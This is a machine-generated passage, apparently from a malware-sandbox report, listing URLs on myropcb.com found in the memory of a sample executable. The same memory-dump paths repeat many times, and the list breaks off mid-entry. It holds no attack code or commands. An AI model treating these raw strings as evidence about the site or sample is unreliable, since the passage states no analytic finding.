              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/blog/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/comments/feed/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/contact-us/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/contact-us/suggestion-box/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/download/DownloadApk.php
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/faq/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/feed/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/my-cart/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/bom/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/fpc-quote/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/parts/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 